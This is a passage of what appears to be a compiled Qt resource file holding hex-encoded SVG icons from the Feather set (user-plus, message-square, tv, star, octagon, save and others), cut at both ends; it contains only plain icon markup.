\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x73\x65\x72\x2d\
\x70\x6c\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x36\x20\x32\x31\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\x30\
\x20\x30\x2d\x34\x2d\x34\x48\x35\x61\x34\x20\x34\x20\x30\x20\x30\
\x20\x30\x2d\x34\x20\x34\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x38\x2e\x35\
\x22\x20\x63\x79\x3d\x22\x37\x22\x20\x72\x3d\x22\x34\x22\x3e\x3c\
\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x30\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\
\x22\x32\x30\x22\x20\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\
\x22\x20\x79\x31\x3d\x22\x31\x31\x22\x20\x78\x32\x3d\x22\x31\x37\
\x22\x20\x79\x32\x3d\x22\x31\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x31\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x65\x73\x73\x61\
\x67\x65\x2d\x73\x71\x75\x61\x72\x65\x22\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x32\x31\x20\x31\x35\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x31\x2d\x32\x20\x32\x48\x37\x6c\x2d\x34\x20\x34\x56\
\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\x68\
\x31\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\
\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x02\x7e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x64\x65\x73\
\x61\x6e\x64\x62\x6f\x78\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\
\x22\x4d\x32\x31\x20\x31\x36\x56\x38\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x2d\x31\x2d\x31\x2e\x37\x33\x6c\x2d\x37\x2d\x34\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x30\x6c\x2d\x37\
\x20\x34\x41\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x33\x20\x38\
\x76\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x31\x20\x31\
\x2e\x37\x33\x6c\x37\x20\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x20\x32\x20\x30\x6c\x37\x2d\x34\x41\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x20\x32\x31\x20\x31\x36\x7a\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x37\x2e\x35\x20\x34\x2e\x32\x31\x20\x31\x32\
\x20\x36\x2e\x38\x31\x20\x31\x36\x2e\x35\x20\x34\x2e\x32\x31\x22\
\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x2e\
\x35\x20\x31\x39\x2e\x37\x39\x20\x37\x2e\x35\x20\x31\x34\x2e\x36\
\x20\x33\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x32\x31\x20\x31\x32\x20\x31\x36\x2e\x35\x20\x31\
\x34\x2e\x36\x20\x31\x36\x2e\x35\x20\x31\x39\x2e\x37\x39\x22\x3e\
\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x33\x2e\x32\
\x37\x20\x36\x2e\x39\x36\x20\x31\x32\x20\x31\x32\x2e\x30\x31\x20\
\x32\x30\x2e\x37\x33\x20\x36\x2e\x39\x36\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x32\x2e\x30\x38\x22\x20\
\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x40\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x76\x22\x3e\x3c\
\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\x20\x79\x3d\x22\x37\x22\
\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\x22\x20\x68\x65\x69\x67\
\x68\x74\x3d\x22\x31\x35\x22\x20\x72\x78\x3d\x22\x32\x22\x20\x72\
\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x37\x20\x32\x20\x31\x32\x20\x37\x20\x37\x20\x32\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x3f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x69\x66\x65\x2d\
\x62\x75\x6f\x79\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\
\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\
\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\
\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\
\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x34\x22\x3e\x3c\x2f\x63\x69\
\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\
\x2e\x39\x33\x22\x20\x79\x31\x3d\x22\x34\x2e\x39\x33\x22\x20\x78\
\x32\x3d\x22\x39\x2e\x31\x37\x22\x20\x79\x32\x3d\x22\x39\x2e\x31\
\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x34\x2e\x38\x33\x22\x20\x79\x31\x3d\x22\x31\
\x34\x2e\x38\x33\x22\x20\x78\x32\x3d\x22\x31\x39\x2e\x30\x37\x22\
\x20\x79\x32\x3d\x22\x31\x39\x2e\x30\x37\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x34\x2e\
\x38\x33\x22\x20\x79\x31\x3d\x22\x39\x2e\x31\x37\x22\x20\x78\x32\
\x3d\x22\x31\x39\x2e\x30\x37\x22\x20\x79\x32\x3d\x22\x34\x2e\x39\
\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x34\x2e\x38\x33\x22\x20\x79\x31\x3d\x22\x39\
\x2e\x31\x37\x22\x20\x78\x32\x3d\x22\x31\x38\x2e\x33\x36\x22\x20\
\x79\x32\x3d\x22\x35\x2e\x36\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x2e\x39\x33\x22\
\x20\x79\x31\x3d\x22\x31\x39\x2e\x30\x37\x22\x20\x78\x32\x3d\x22\
\x39\x2e\x31\x37\x22\x20\x79\x32\x3d\x22\x31\x34\x2e\x38\x33\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x49\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x69\x64\x65\x6f\
\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x32\x33\x20\x37\x20\x31\x36\x20\x31\x32\x20\x32\x33\
\x20\x31\x37\x20\x32\x33\x20\x37\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x67\x6f\x6e\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x31\x22\x20\
\x79\x3d\x22\x35\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x35\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x34\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x05\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x69\x6e\x75\x73\
\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x35\x22\x20\x79\
\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x31\x39\x22\x20\x79\
\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x53\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x74\x61\x72\x22\
\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x31\x32\x20\x32\x20\x31\x35\x2e\x30\x39\x20\x38\x2e\x32\
\x36\x20\x32\x32\x20\x39\x2e\x32\x37\x20\x31\x37\x20\x31\x34\x2e\
\x31\x34\x20\x31\x38\x2e\x31\x38\x20\x32\x31\x2e\x30\x32\x20\x31\
\x32\x20\x31\x37\x2e\x37\x37\x20\x35\x2e\x38\x32\x20\x32\x31\x2e\
\x30\x32\x20\x37\x20\x31\x34\x2e\x31\x34\x20\x32\x20\x39\x2e\x32\
\x37\x20\x38\x2e\x39\x31\x20\x38\x2e\x32\x36\x20\x31\x32\x20\x32\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x3d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x73\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x20\x31\x33\
\x20\x31\x32\x20\x31\x38\x20\x31\x37\x20\x31\x33\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x20\x36\x20\x31\
\x32\x20\x31\x31\x20\x31\x37\x20\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6f\x63\x74\x61\x67\
\x6f\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x37\x2e\x38\x36\x20\x32\x20\x31\x36\x2e\x31\
\x34\x20\x32\x20\x32\x32\x20\x37\x2e\x38\x36\x20\x32\x32\x20\x31\
\x36\x2e\x31\x34\x20\x31\x36\x2e\x31\x34\x20\x32\x32\x20\x37\x2e\
\x38\x36\x20\x32\x32\x20\x32\x20\x31\x36\x2e\x31\x34\x20\x32\x20\
\x37\x2e\x38\x36\x20\x37\x2e\x38\x36\x20\x32\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x83\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x65\x2d\
\x6d\x69\x6e\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x34\x20\x32\x48\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x2d\x32\x20\x32\x76\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x30\x20\x32\x20\x32\x68\x31\x32\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x20\x32\x2d\x32\x56\x38\x7a\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x31\x34\x20\x32\x20\x31\x34\x20\x38\x20\x32\
\x30\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\x31\x3d\
\x22\x31\x35\x22\x20\x78\x32\x3d\x22\x31\x35\x22\x20\x79\x32\x3d\
\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x88\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x61\x76\x65\x22\
